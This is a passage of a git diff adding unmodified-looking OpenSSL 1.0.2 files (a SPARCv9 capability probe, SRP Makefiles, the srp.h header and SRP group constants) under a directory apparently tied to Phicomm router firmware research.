+     * because VIS3 defines even integer instructions.
+     */
+    if (sigsetjmp(common_jmp, 1) == 0) {
+        _sparcv9_vis3_probe();
+        OPENSSL_sparcv9cap_P[0] |= SPARCV9_VIS3;
+    }
+# if 0                          /* was planned at some point but never
+                                 * implemented in hardware */
+    if (sigsetjmp(common_jmp, 1) == 0) {
+        (void)_sparcv9_random();
+        OPENSSL_sparcv9cap_P[0] |= SPARCV9_RANDOM;
+    }
+# endif
+
+    /*
+     * In wait for better solution _sparcv9_rdcfr is masked by
+     * VIS3 flag, because it goes to uninterruptable endless
+     * loop on UltraSPARC II running Solaris. Things might be
+     * different on Linux...
+     */
+    if ((OPENSSL_sparcv9cap_P[0] & SPARCV9_VIS3) &&
+        sigsetjmp(common_jmp, 1) == 0) {
+        OPENSSL_sparcv9cap_P[1] = (unsigned int)_sparcv9_rdcfr();
+    }
+
+    sigaction(SIGBUS, &bus_oact, NULL);
+    sigaction(SIGILL, &ill_oact, NULL);
+
+    sigprocmask(SIG_SETMASK, &oset, NULL);
+
+    if (sizeof(size_t) == 8)
+        OPENSSL_sparcv9cap_P[0] |= SPARCV9_64BIT_STACK;
+# ifdef __linux
+    else {
+        int ret = syscall(340);
+
+        if (ret >= 0 && ret & 1)
+            OPENSSL_sparcv9cap_P[0] |= SPARCV9_64BIT_STACK;
+    }
+# endif
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/Makefile
new file mode 100644
index 0000000..ddf6748
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/Makefile
@@ -0,0 +1,101 @@
+DIR=	srp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+INSTALL_PREFIX=
+OPENSSLDIR=     /usr/local/ssl
+INSTALLTOP=/usr/local/ssl
+MAKE=		make -f Makefile.ssl
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=	Makefile.ssl
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=srptest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=srp_lib.c srp_vfy.c
+LIBOBJ=srp_lib.o srp_vfy.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= srp.h
+HEADER=	$(EXHEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+srptest: top srptest.c $(LIB)
+	$(CC) $(CFLAGS) -Wall -Werror -g -o srptest srptest.c $(LIB)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+srp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+srp_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+srp_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+srp_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+srp_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+srp_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+srp_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+srp_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+srp_lib.o: ../../include/openssl/sha.h ../../include/openssl/srp.h
+srp_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+srp_lib.o: ../cryptlib.h srp_grps.h srp_lcl.h srp_lib.c
+srp_vfy.o: ../../e_os.h ../../include/openssl/asn1.h
+srp_vfy.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+srp_vfy.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+srp_vfy.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+srp_vfy.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+srp_vfy.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+srp_vfy.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+srp_vfy.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+srp_vfy.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+srp_vfy.o: ../../include/openssl/srp.h ../../include/openssl/stack.h
+srp_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/txt_db.h
+srp_vfy.o: ../cryptlib.h srp_lcl.h srp_vfy.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/Makefile.save
new file mode 100644
index 0000000..ddf6748
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/Makefile.save
@@ -0,0 +1,101 @@
+DIR=	srp
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+INSTALL_PREFIX=
+OPENSSLDIR=     /usr/local/ssl
+INSTALLTOP=/usr/local/ssl
+MAKE=		make -f Makefile.ssl
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=	Makefile.ssl
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile
+TEST=srptest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=srp_lib.c srp_vfy.c
+LIBOBJ=srp_lib.o srp_vfy.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= srp.h
+HEADER=	$(EXHEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+srptest: top srptest.c $(LIB)
+	$(CC) $(CFLAGS) -Wall -Werror -g -o srptest srptest.c $(LIB)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+srp_lib.o: ../../e_os.h ../../include/openssl/asn1.h
+srp_lib.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+srp_lib.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+srp_lib.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+srp_lib.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+srp_lib.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+srp_lib.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+srp_lib.o: ../../include/openssl/ossl_typ.h ../../include/openssl/safestack.h
+srp_lib.o: ../../include/openssl/sha.h ../../include/openssl/srp.h
+srp_lib.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+srp_lib.o: ../cryptlib.h srp_grps.h srp_lcl.h srp_lib.c
+srp_vfy.o: ../../e_os.h ../../include/openssl/asn1.h
+srp_vfy.o: ../../include/openssl/bio.h ../../include/openssl/bn.h
+srp_vfy.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+srp_vfy.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+srp_vfy.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+srp_vfy.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+srp_vfy.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+srp_vfy.o: ../../include/openssl/ossl_typ.h ../../include/openssl/rand.h
+srp_vfy.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+srp_vfy.o: ../../include/openssl/srp.h ../../include/openssl/stack.h
+srp_vfy.o: ../../include/openssl/symhacks.h ../../include/openssl/txt_db.h
+srp_vfy.o: ../cryptlib.h srp_lcl.h srp_vfy.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp.h
new file mode 100644
index 0000000..d072536
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp.h
@@ -0,0 +1,169 @@
+/* crypto/srp/srp.h */
+/*
+ * Written by Christophe Renou (christophe.renou@edelweb.fr) with the
+ * precious help of Peter Sylvester (peter.sylvester@edelweb.fr) for the
+ * EdelKey project and contributed to the OpenSSL project 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+#ifndef __SRP_H__
+# define __SRP_H__
+
+# ifndef OPENSSL_NO_SRP
+
+#  include <stdio.h>
+#  include <string.h>
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+#  include <openssl/safestack.h>
+#  include <openssl/bn.h>
+#  include <openssl/crypto.h>
+
+typedef struct SRP_gN_cache_st {
+    char *b64_bn;
+    BIGNUM *bn;
+} SRP_gN_cache;
+
+
+DECLARE_STACK_OF(SRP_gN_cache)
+
+typedef struct SRP_user_pwd_st {
+    char *id;
+    BIGNUM *s;
+    BIGNUM *v;
+    const BIGNUM *g;
+    const BIGNUM *N;
+    char *info;
+} SRP_user_pwd;
+
+DECLARE_STACK_OF(SRP_user_pwd)
+
+typedef struct SRP_VBASE_st {
+    STACK_OF(SRP_user_pwd) *users_pwd;
+    STACK_OF(SRP_gN_cache) *gN_cache;
+/* to simulate a user */
+    char *seed_key;
+    BIGNUM *default_g;
+    BIGNUM *default_N;
+} SRP_VBASE;
+
+/*
+ * Structure interne pour retenir les couples N et g
+ */
+typedef struct SRP_gN_st {
+    char *id;
+    BIGNUM *g;
+    BIGNUM *N;
+} SRP_gN;
+
+DECLARE_STACK_OF(SRP_gN)
+
+SRP_VBASE *SRP_VBASE_new(char *seed_key);
+int SRP_VBASE_free(SRP_VBASE *vb);
+int SRP_VBASE_init(SRP_VBASE *vb, char *verifier_file);
+SRP_user_pwd *SRP_VBASE_get_by_user(SRP_VBASE *vb, char *username);
+char *SRP_create_verifier(const char *user, const char *pass, char **salt,
+                          char **verifier, const char *N, const char *g);
+int SRP_create_verifier_BN(const char *user, const char *pass, BIGNUM **salt,
+                           BIGNUM **verifier, BIGNUM *N, BIGNUM *g);
+
+#  define SRP_NO_ERROR 0
+#  define SRP_ERR_VBASE_INCOMPLETE_FILE 1
+#  define SRP_ERR_VBASE_BN_LIB 2
+#  define SRP_ERR_OPEN_FILE 3
+#  define SRP_ERR_MEMORY 4
+
+#  define DB_srptype      0
+#  define DB_srpverifier  1
+#  define DB_srpsalt      2
+#  define DB_srpid        3
+#  define DB_srpgN        4
+#  define DB_srpinfo      5
+#  undef  DB_NUMBER
+#  define DB_NUMBER       6
+
+#  define DB_SRP_INDEX    'I'
+#  define DB_SRP_VALID    'V'
+#  define DB_SRP_REVOKED  'R'
+#  define DB_SRP_MODIF    'v'
+
+/* see srp.c */
+char *SRP_check_known_gN_param(BIGNUM *g, BIGNUM *N);
+SRP_gN *SRP_get_default_gN(const char *id);
+
+/* server side .... */
+BIGNUM *SRP_Calc_server_key(BIGNUM *A, BIGNUM *v, BIGNUM *u, BIGNUM *b,
+                            BIGNUM *N);
+BIGNUM *SRP_Calc_B(BIGNUM *b, BIGNUM *N, BIGNUM *g, BIGNUM *v);
+int SRP_Verify_A_mod_N(BIGNUM *A, BIGNUM *N);
+BIGNUM *SRP_Calc_u(BIGNUM *A, BIGNUM *B, BIGNUM *N);
+
+/* client side .... */
+BIGNUM *SRP_Calc_x(BIGNUM *s, const char *user, const char *pass);
+BIGNUM *SRP_Calc_A(BIGNUM *a, BIGNUM *N, BIGNUM *g);
+BIGNUM *SRP_Calc_client_key(BIGNUM *N, BIGNUM *B, BIGNUM *g, BIGNUM *x,
+                            BIGNUM *a, BIGNUM *u);
+int SRP_Verify_B_mod_N(BIGNUM *B, BIGNUM *N);
+
+#  define SRP_MINIMAL_N 1024
+
+#ifdef  __cplusplus
+}
+#endif
+
+# endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_grps.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_grps.h
new file mode 100644
index 0000000..31312de
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/srp/srp_grps.h
@@ -0,0 +1,528 @@
+/* start of generated data */
+
+static BN_ULONG bn_group_1024_value[] = {
+    bn_pack4(0x9FC6, 0x1D2F, 0xC0EB, 0x06E3),
+    bn_pack4(0xFD51, 0x38FE, 0x8376, 0x435B),
+    bn_pack4(0x2FD4, 0xCBF4, 0x976E, 0xAA9A),
+    bn_pack4(0x68ED, 0xBC3C, 0x0572, 0x6CC0),
+    bn_pack4(0xC529, 0xF566, 0x660E, 0x57EC),
+    bn_pack4(0x8255, 0x9B29, 0x7BCF, 0x1885),
+    bn_pack4(0xCE8E, 0xF4AD, 0x69B1, 0x5D49),
+    bn_pack4(0x5DC7, 0xD7B4, 0x6154, 0xD6B6),
+    bn_pack4(0x8E49, 0x5C1D, 0x6089, 0xDAD1),
+    bn_pack4(0xE0D5, 0xD8E2, 0x50B9, 0x8BE4),
+    bn_pack4(0x383B, 0x4813, 0xD692, 0xC6E0),
+    bn_pack4(0xD674, 0xDF74, 0x96EA, 0x81D3),
+    bn_pack4(0x9EA2, 0x314C, 0x9C25, 0x6576),
+    bn_pack4(0x6072, 0x6187, 0x75FF, 0x3C0B),
+    bn_pack4(0x9C33, 0xF80A, 0xFA8F, 0xC5E8),
+    bn_pack4(0xEEAF, 0x0AB9, 0xADB3, 0x8DD6)
+};
+
+static BIGNUM bn_group_1024 = {
+    bn_group_1024_value,
+    (sizeof bn_group_1024_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_1024_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_group_1536_value[] = {
+    bn_pack4(0xCF76, 0xE3FE, 0xD135, 0xF9BB),
+    bn_pack4(0x1518, 0x0F93, 0x499A, 0x234D),
+    bn_pack4(0x8CE7, 0xA28C, 0x2442, 0xC6F3),
+    bn_pack4(0x5A02, 0x1FFF, 0x5E91, 0x479E),
+    bn_pack4(0x7F8A, 0x2FE9, 0xB8B5, 0x292E),
+    bn_pack4(0x837C, 0x264A, 0xE3A9, 0xBEB8),
+    bn_pack4(0xE442, 0x734A, 0xF7CC, 0xB7AE),
+    bn_pack4(0x6577, 0x2E43, 0x7D6C, 0x7F8C),
+    bn_pack4(0xDB2F, 0xD53D, 0x24B7, 0xC486),
+    bn_pack4(0x6EDF, 0x0195, 0x3934, 0x9627),
+    bn_pack4(0x158B, 0xFD3E, 0x2B9C, 0x8CF5),
+    bn_pack4(0x764E, 0x3F4B, 0x53DD, 0x9DA1),
+    bn_pack4(0x4754, 0x8381, 0xDBC5, 0xB1FC),
+    bn_pack4(0x9B60, 0x9E0B, 0xE3BA, 0xB63D),
+    bn_pack4(0x8134, 0xB1C8, 0xB979, 0x8914),
+    bn_pack4(0xDF02, 0x8A7C, 0xEC67, 0xF0D0),
+    bn_pack4(0x80B6, 0x55BB, 0x9A22, 0xE8DC),
+    bn_pack4(0x1558, 0x903B, 0xA0D0, 0xF843),
+    bn_pack4(0x51C6, 0xA94B, 0xE460, 0x7A29),
+    bn_pack4(0x5F4F, 0x5F55, 0x6E27, 0xCBDE),
+    bn_pack4(0xBEEE, 0xA961, 0x4B19, 0xCC4D),
+    bn_pack4(0xDBA5, 0x1DF4, 0x99AC, 0x4C80),
+    bn_pack4(0xB1F1, 0x2A86, 0x17A4, 0x7BBB),
+    bn_pack4(0x9DEF, 0x3CAF, 0xB939, 0x277A)
+};
+
+static BIGNUM bn_group_1536 = {
+    bn_group_1536_value,
+    (sizeof bn_group_1536_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_1536_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_group_2048_value[] = {
+    bn_pack4(0x0FA7, 0x111F, 0x9E4A, 0xFF73),
+    bn_pack4(0x9B65, 0xE372, 0xFCD6, 0x8EF2),
+    bn_pack4(0x35DE, 0x236D, 0x525F, 0x5475),
+    bn_pack4(0x94B5, 0xC803, 0xD89F, 0x7AE4),
+    bn_pack4(0x71AE, 0x35F8, 0xE9DB, 0xFBB6),
+    bn_pack4(0x2A56, 0x98F3, 0xA8D0, 0xC382),
+    bn_pack4(0x9CCC, 0x041C, 0x7BC3, 0x08D8),
+    bn_pack4(0xAF87, 0x4E73, 0x03CE, 0x5329),
+    bn_pack4(0x6160, 0x2790, 0x04E5, 0x7AE6),
+    bn_pack4(0x032C, 0xFBDB, 0xF52F, 0xB378),
+    bn_pack4(0x5EA7, 0x7A27, 0x75D2, 0xECFA),
+    bn_pack4(0x5445, 0x23B5, 0x24B0, 0xD57D),
+    bn_pack4(0x5B9D, 0x32E6, 0x88F8, 0x7748),
+    bn_pack4(0xF1D2, 0xB907, 0x8717, 0x461A),
+    bn_pack4(0x76BD, 0x207A, 0x436C, 0x6481),
+    bn_pack4(0xCA97, 0xB43A, 0x23FB, 0x8016),
+    bn_pack4(0x1D28, 0x1E44, 0x6B14, 0x773B),
+    bn_pack4(0x7359, 0xD041, 0xD5C3, 0x3EA7),
+    bn_pack4(0xA80D, 0x740A, 0xDBF4, 0xFF74),
+    bn_pack4(0x55F9, 0x7993, 0xEC97, 0x5EEA),
+    bn_pack4(0x2918, 0xA996, 0x2F0B, 0x93B8),
+    bn_pack4(0x661A, 0x05FB, 0xD5FA, 0xAAE8),
+    bn_pack4(0xCF60, 0x9517, 0x9A16, 0x3AB3),
+    bn_pack4(0xE808, 0x3969, 0xEDB7, 0x67B0),
+    bn_pack4(0xCD7F, 0x48A9, 0xDA04, 0xFD50),
+    bn_pack4(0xD523, 0x12AB, 0x4B03, 0x310D),
+    bn_pack4(0x8193, 0xE075, 0x7767, 0xA13D),
+    bn_pack4(0xA373, 0x29CB, 0xB4A0, 0x99ED),
+    bn_pack4(0xFC31, 0x9294, 0x3DB5, 0x6050),
+    bn_pack4(0xAF72, 0xB665, 0x1987, 0xEE07),
+    bn_pack4(0xF166, 0xDE5E, 0x1389, 0x582F),
+    bn_pack4(0xAC6B, 0xDB41, 0x324A, 0x9A9B)
+};
+
+static BIGNUM bn_group_2048 = {
+    bn_group_2048_value,
+    (sizeof bn_group_2048_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_2048_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_group_3072_value[] = {
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF),
+    bn_pack4(0x4B82, 0xD120, 0xA93A, 0xD2CA),
+    bn_pack4(0x43DB, 0x5BFC, 0xE0FD, 0x108E),
+    bn_pack4(0x08E2, 0x4FA0, 0x74E5, 0xAB31),
+    bn_pack4(0x7709, 0x88C0, 0xBAD9, 0x46E2),
+    bn_pack4(0xBBE1, 0x1757, 0x7A61, 0x5D6C),
+    bn_pack4(0x521F, 0x2B18, 0x177B, 0x200C),
+    bn_pack4(0xD876, 0x0273, 0x3EC8, 0x6A64),
+    bn_pack4(0xF12F, 0xFA06, 0xD98A, 0x0864),
+    bn_pack4(0xCEE3, 0xD226, 0x1AD2, 0xEE6B),
+    bn_pack4(0x1E8C, 0x94E0, 0x4A25, 0x619D),
+    bn_pack4(0xABF5, 0xAE8C, 0xDB09, 0x33D7),
+    bn_pack4(0xB397, 0x0F85, 0xA6E1, 0xE4C7),
+    bn_pack4(0x8AEA, 0x7157, 0x5D06, 0x0C7D),
+    bn_pack4(0xECFB, 0x8504, 0x58DB, 0xEF0A),
+    bn_pack4(0xA855, 0x21AB, 0xDF1C, 0xBA64),
+    bn_pack4(0xAD33, 0x170D, 0x0450, 0x7A33),
+    bn_pack4(0x1572, 0x8E5A, 0x8AAA, 0xC42D),
+    bn_pack4(0x15D2, 0x2618, 0x98FA, 0x0510),
+    bn_pack4(0x3995, 0x497C, 0xEA95, 0x6AE5),
+    bn_pack4(0xDE2B, 0xCBF6, 0x9558, 0x1718),
+    bn_pack4(0xB5C5, 0x5DF0, 0x6F4C, 0x52C9),
+    bn_pack4(0x9B27, 0x83A2, 0xEC07, 0xA28F),
+    bn_pack4(0xE39E, 0x772C, 0x180E, 0x8603),
+    bn_pack4(0x3290, 0x5E46, 0x2E36, 0xCE3B),
+    bn_pack4(0xF174, 0x6C08, 0xCA18, 0x217C),
+    bn_pack4(0x670C, 0x354E, 0x4ABC, 0x9804),
+    bn_pack4(0x9ED5, 0x2907, 0x7096, 0x966D),
+    bn_pack4(0x1C62, 0xF356, 0x2085, 0x52BB),
+    bn_pack4(0x8365, 0x5D23, 0xDCA3, 0xAD96),
+    bn_pack4(0x6916, 0x3FA8, 0xFD24, 0xCF5F),
+    bn_pack4(0x98DA, 0x4836, 0x1C55, 0xD39A),
+    bn_pack4(0xC200, 0x7CB8, 0xA163, 0xBF05),
+    bn_pack4(0x4928, 0x6651, 0xECE4, 0x5B3D),
+    bn_pack4(0xAE9F, 0x2411, 0x7C4B, 0x1FE6),
+    bn_pack4(0xEE38, 0x6BFB, 0x5A89, 0x9FA5),
+    bn_pack4(0x0BFF, 0x5CB6, 0xF406, 0xB7ED),
+    bn_pack4(0xF44C, 0x42E9, 0xA637, 0xED6B),
+    bn_pack4(0xE485, 0xB576, 0x625E, 0x7EC6),
+    bn_pack4(0x4FE1, 0x356D, 0x6D51, 0xC245),
+    bn_pack4(0x302B, 0x0A6D, 0xF25F, 0x1437),
+    bn_pack4(0xEF95, 0x19B3, 0xCD3A, 0x431B),
+    bn_pack4(0x514A, 0x0879, 0x8E34, 0x04DD),
+    bn_pack4(0x020B, 0xBEA6, 0x3B13, 0x9B22),
+    bn_pack4(0x2902, 0x4E08, 0x8A67, 0xCC74),
+    bn_pack4(0xC4C6, 0x628B, 0x80DC, 0x1CD1),
+    bn_pack4(0xC90F, 0xDAA2, 0x2168, 0xC234),
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF)
+};
+
+static BIGNUM bn_group_3072 = {
+    bn_group_3072_value,
+    (sizeof bn_group_3072_value) / sizeof(BN_ULONG),
+    (sizeof bn_group_3072_value) / sizeof(BN_ULONG),
+    0,
+    BN_FLG_STATIC_DATA
+};
+
+static BN_ULONG bn_group_4096_value[] = {
+    bn_pack4(0xFFFF, 0xFFFF, 0xFFFF, 0xFFFF),
+    bn_pack4(0x4DF4, 0x35C9, 0x3406, 0x3199),
+    bn_pack4(0x86FF, 0xB7DC, 0x90A6, 0xC08F),
+    bn_pack4(0x93B4, 0xEA98, 0x8D8F, 0xDDC1),
+    bn_pack4(0xD006, 0x9127, 0xD5B0, 0x5AA9),
+    bn_pack4(0xB81B, 0xDD76, 0x2170, 0x481C),
+    bn_pack4(0x1F61, 0x2970, 0xCEE2, 0xD7AF),
+    bn_pack4(0x233B, 0xA186, 0x515B, 0xE7ED),
+    bn_pack4(0x99B2, 0x964F, 0xA090, 0xC3A2),
+    bn_pack4(0x287C, 0x5947, 0x4E6B, 0xC05D),
+    bn_pack4(0x2E8E, 0xFC14, 0x1FBE, 0xCAA6),
+    bn_pack4(0xDBBB, 0xC2DB, 0x04DE, 0x8EF9),
+    bn_pack4(0x2583, 0xE9CA, 0x2AD4, 0x4CE8),
+    bn_pack4(0x1A94, 0x6834, 0xB615, 0x0BDA),
+    bn_pack4(0x99C3, 0x2718, 0x6AF4, 0xE23C),
+    bn_pack4(0x8871, 0x9A10, 0xBDBA, 0x5B26),
+    bn_pack4(0x1A72, 0x3C12, 0xA787, 0xE6D7),
+    bn_pack4(0x4B82, 0xD120, 0xA921, 0x0801),
+    bn_pack4(0x43DB, 0x5BFC, 0xE0FD, 0x108E),
+    bn_pack4(0x08E2, 0x4FA0, 0x74E5, 0xAB31),
+    bn_pack4(0x7709, 0x88C0, 0xBAD9, 0x46E2),
+    bn_pack4(0xBBE1, 0x1757, 0x7A61, 0x5D6C),
+    bn_pack4(0x521F, 0x2B18, 0x177B, 0x200C),
+    bn_pack4(0xD876, 0x0273, 0x3EC8, 0x6A64),
+    bn_pack4(0xF12F, 0xFA06, 0xD98A, 0x0864),
+    bn_pack4(0xCEE3, 0xD226, 0x1AD2, 0xEE6B),
+    bn_pack4(0x1E8C, 0x94E0, 0x4A25, 0x619D),
+    bn_pack4(0xABF5, 0xAE8C, 0xDB09, 0x33D7),
+    bn_pack4(0xB397, 0x0F85, 0xA6E1, 0xE4C7),
